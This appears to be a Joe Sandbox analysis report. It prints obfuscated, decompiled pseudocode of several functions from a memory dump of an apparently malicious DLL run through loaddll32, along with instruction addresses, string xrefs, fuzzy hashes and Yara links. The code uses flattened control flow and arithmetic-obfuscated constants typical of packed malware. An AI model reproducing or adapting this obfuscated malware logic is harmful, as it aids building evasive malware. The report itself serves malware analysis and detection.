				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_push("true");
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_pop(_t332);
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E00D546BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E00D507AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E00D3C5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E00D4C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E00D3C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E00D52B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}

0x00d36b81
0x00d36b8b
0x00d36b8c
0x00d36b93
0x00d36b95
0x00d36b96
0x00d36b97
0x00d36b9c
0x00d36ba7
0x00d36baa
0x00d36bb5
0x00d36bb7
0x00d36bc4
0x00d36bcb
0x00d36bd0
0x00d36bd8
0x00d36be0
0x00d36be8
0x00d36bf0
0x00d36bfe
0x00d36c03
0x00d36c09
0x00d36c11
0x00d36c19
0x00d36c21
0x00d36c26
0x00d36c33
0x00d36c36
0x00d36c3a
0x00d36c42
0x00d36c4a
0x00d36c52
0x00d36c5a
0x00d36c62
0x00d36c72
0x00d36c76
0x00d36c7e
0x00d36c86
0x00d36c92
0x00d36c97
0x00d36c9d
0x00d36ca2
0x00d36caa
0x00d36cb6
0x00d36cb9
0x00d36cbd
0x00d36cc2
0x00d36cc7
0x00d36ccf
0x00d36cd7
0x00d36cdc
0x00d36ce4
0x00d36cec
0x00d36cf4
0x00d36cf9
0x00d36cfe
0x00d36d06
0x00d36d0e
0x00d36d13
0x00d36d1b
0x00d36d23
0x00d36d2d
0x00d36d35
0x00d36d3d
0x00d36d45
0x00d36d4d
0x00d36d55
0x00d36d5d
0x00d36d63
0x00d36d66
0x00d36d68
0x00d36d6e
0x00d36d7a
0x00d36d7f
0x00d36d85
0x00d36d8d
0x00d36d99
0x00d36d9e
0x00d36da4
0x00d36dac
0x00d36db4
0x00d36db9
0x00d36dc1
0x00d36dc6
0x00d36dce
0x00d36dd6
0x00d36dde
0x00d36de3
0x00d36deb
0x00d36df3
0x00d36e00
0x00d36e01
0x00d36e05
0x00d36e0d
0x00d36e20
0x00d36e24
0x00d36e2c
0x00d36e34
0x00d36e3c
0x00d36e44
0x00d36e4c
0x00d36e54
0x00d36e5c
0x00d36e64
0x00d36e6c
0x00d36e74
0x00d36e7c
0x00d36e84
0x00d36e91
0x00d36e95
0x00d36e9d
0x00d36ea5
0x00d36ead
0x00d36eb5
0x00d36ebd
0x00d36ecb
0x00d3702a
0x00d3702f
0x00d37034
0x00d3706b
0x00d37077
0x00d37077
0x00d37036
0x00000000
0x00d37036
0x00d36ed7
0x00d37004
0x00000000
0x00d37004
0x00d36ee3
0x00d36f94
0x00d36f99
0x00d36f9e
0x00d36fa3
0x00d36fb5
0x00d36fb6
0x00d36fbe
0x00d36fc3
0x00d36fc6
0x00d36fca
0x00d36fe8
0x00d36ff6
0x00d36ff9
0x00d36ffc
0x00d36ffc
0x00d36fca
0x00d36ffd
0x00000000
0x00d36ffd
0x00d36eef
0x00d36f62
0x00d36f67
0x00d36f6e
0x00d36f76
0x00000000
0x00d36f76
0x00d36ef7
0x00d3705f
0x00d37065
0x00000000
0x00000000
0x00000000
0x00d37065
0x00d36efd
0x00d36f00
0x00d36f02
0x00d36f07
0x00d36f0b
0x00d36f15
0x00d36f12
0x00000000
0x00000000
0x00d36f14
0x00d36f14
0x00d36f19
0x00d36f1b
0x00d36f1f
0x00d36f39
0x00d36f39
0x00000000
0x00d36f39
0x00d36f21
0x00d36f33
0x00d36f33
0x00d36f37
0x00000000
0x00000000
0x00000000
0x00d36f37
0x00000000
0x00d36f21
0x00d37053
0x00d3705a
0x00000000

Strings

Nb5, xrefs: 00D36D06
an, xrefs: 00D36E2C
@Y, xrefs: 00D36CC7
8K, xrefs: 00D36EAD
Wd, xrefs: 00D36CFE
0yu, xrefs: 00D36B9C
5X', xrefs: 00D36D5D

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
API String ID: 0-1112794312
Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction ID: 70b9d93c17faba2188485990b31699f3038476259575591815cf508777e8421b
Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
Instruction Fuzzy Hash: 33C142715083809FD328CF66D54AA2BBBF1FBC5748F10891DF69A86260D7B2C949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D4DC71, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D4DC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E00D5298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E00D32DEA(_v96,  &_v8, _v60, 0xd310a0, _v28, _v100, 0xd310a0, 0xd310a0, _v104, _v64, 0xd310a0, 0xd310a0, _v68, _v72, _v32, _v76, _v36, E00D4E1F8(0xd310a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E00D4FECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0xd56214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E00D353D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x00d4dc71
0x00d4dc74
0x00d4dc7e
0x00d4dc85
0x00d4dc8d
0x00d4dc95
0x00d4dca1
0x00d4dca5
0x00d4dcb0
0x00d4dcb5
0x00d4dcbb
0x00d4dcc3
0x00d4dccb
0x00d4dcd7
0x00d4dcdc
0x00d4dce2
0x00d4dcea
0x00d4dcf2
0x00d4dcfa
0x00d4dd02
0x00d4dd07
0x00d4dd0f
0x00d4dd17
0x00d4dd1f
0x00d4dd24
0x00d4dd2c
0x00d4dd34
0x00d4dd39
0x00d4dd3e
0x00d4dd46
0x00d4dd4e
0x00d4dd56
0x00d4dd5b
0x00d4dd63
0x00d4dd6b
0x00d4dd73
0x00d4dd7b
0x00d4dd83
0x00d4dd8b
0x00d4dd93
0x00d4dd98
0x00d4dda4
0x00d4dda9
0x00d4ddaf
0x00d4ddb7
0x00d4ddbf
0x00d4ddc8
0x00d4ddcd
0x00d4ddd3
0x00d4ddd8
0x00d4dde0
0x00d4dde8
0x00d4ddf0
0x00d4ddf8
0x00d4de00
0x00d4de08
0x00d4de14
0x00d4de17
0x00d4de1d
0x00d4de2a
0x00d4de38
0x00d4de3b
0x00d4de3f
0x00d4de43
0x00d4de4b
0x00d4de58
0x00d4de5c
0x00d4de64
0x00d4de6c
0x00d4de74
0x00d4de7c
0x00d4de84
0x00d4de8c
0x00d4de94
0x00d4de99
0x00d4dea1
0x00d4dea9
0x00d4deb1
0x00d4deb9
0x00d4dec1
0x00d4dec9
0x00d4ded1
0x00d4ded9
0x00d4dede
0x00d4dee6
0x00d4def3
0x00d4def7
0x00d4deff
0x00d4df07
0x00d4df0f
0x00d4df17
0x00d4df1f
0x00d4df27
0x00d4df2f
0x00d4df34
0x00d4df3c
0x00d4df49
0x00d4df4d
0x00d4df55
0x00d4df5d
0x00d4df62
0x00d4df6a
0x00d4df72
0x00d4df7a
0x00d4df82
0x00d4df8a
0x00d4df92
0x00d4df9a
0x00d4dfa2
0x00d4dfa2
0x00d4dfa4
0x00d4dfa5
0x00d4dfa5
0x00d4dfaa
0x00000000
0x00d4dfaa
0x00d4dfb8
0x00d4e0a0
0x00d4e0a7
0x00d4e0aa
0x00d4e0ac
0x00d4e0b4
0x00000000
0x00d4dfbe
0x00d4dfc4
0x00d4e001
0x00d4e00a
0x00d4e00e
0x00d4e065
0x00d4e082
0x00d4e085
0x00d4e08a
0x00d4e0d6
0x00d4e0d8
0x00d4e0dd
0x00d4dfc6
0x00d4dfcc
0x00d4dffa
0x00000000
0x00d4dfce
0x00d4dfd4
0x00d4dfda
0x00d4dfe0
0x00d4dfeb
0x00d4dfe8
0x00d4dfe8
0x00d4dfe8
0x00d4dff0
0x00d4dff3
0x00d4dfa5
0x00000000
0x00d4dfa5
0x00d4dfd4
0x00d4dfcc
0x00d4dfc4
0x00000000
0x00d4dfb8
0x00d4e0cd
0x00d4e0d4
0x00000000
0x00d4e0de
0x00d4e0de
0x00d4e0de
0x00d4e0f1
0x00d4e0f1
0x00d4dfa5

Strings

8+{, xrefs: 00D4DF3C
H%, xrefs: 00D4DCE2
fH, xrefs: 00D4DD3E
.|8, xrefs: 00D4DDB7
41, xrefs: 00D4DEA1
s~eP, xrefs: 00D4DCFA
1, xrefs: 00D4DD98

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: 7d852ee8891dcc3a0a1797d226e82b23177d6d1262eefb9c3250ad912995270d
Instruction ID: 90139d8930b43488c1fd4bd2ad106eed7c74c89299696f2274998035966f669e
Opcode Fuzzy Hash: 7d852ee8891dcc3a0a1797d226e82b23177d6d1262eefb9c3250ad912995270d
Instruction Fuzzy Hash: 10B10F725083809FD368CF25D98A40BFBE2FBC4758F10891DF69A86260D7B98949CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D3670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D3670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E00D50DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E00D4DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E00D51538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E00D545CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E00D35477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E00D4CA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x00d36711
0x00d3671b
0x00d36727
0x00d36729
0x00d3672e
0x00d36735
0x00d3673d
0x00d36744
0x00d36747
0x00d3674b
0x00d36753
0x00d3675b
0x00d36763
0x00d36768
0x00d36770
0x00d36778
0x00d36780
0x00d36785
0x00d3678d
0x00d36795
0x00d3679a
0x00d367a2
0x00d367aa
0x00d367b7
0x00d367bb
0x00d367c3
0x00d367cb
0x00d367d3
0x00d367db
0x00d367e0
0x00d367ed
0x00d367f1
0x00d367f9
0x00d36801
0x00d36806
0x00d3680a
0x00d3680f
0x00d36813
0x00d3681b
0x00d36823
0x00d36828
0x00d3682c
0x00d36831
0x00d36839
0x00d36841
0x00d3684e
0x00d36852
0x00d36857
0x00d3685f
0x00d3686c
0x00d3686d
0x00d36871
0x00d36876
0x00d3687b
0x00d36883
0x00d3688b
0x00d36893
0x00d3689b
0x00d368a3
0x00d368ab
0x00d368b3
0x00d368bb
0x00d368c0
0x00d368c8
0x00d368d5
0x00d368df
0x00d368e5
0x00d368f2
0x00d368fa
0x00d368ff
0x00d36904
0x00d3690c
0x00d36914
0x00d3691c
0x00d36924
0x00d3692c
0x00d36934
0x00d3693c
0x00d36941
0x00d36949
0x00d36957
0x00d3695c
0x00d36962
0x00d36967
0x00d3696f
0x00d3697c
0x00d3697d
0x00d36981
0x00d36986
0x00d3698e
0x00d36996
0x00d3699e
0x00d369a6
0x00d369ae
0x00d369b6
0x00d369bb
0x00d369c3
0x00d369c8
0x00d369d0
0x00d369d8
0x00d369e0
0x00d369e8
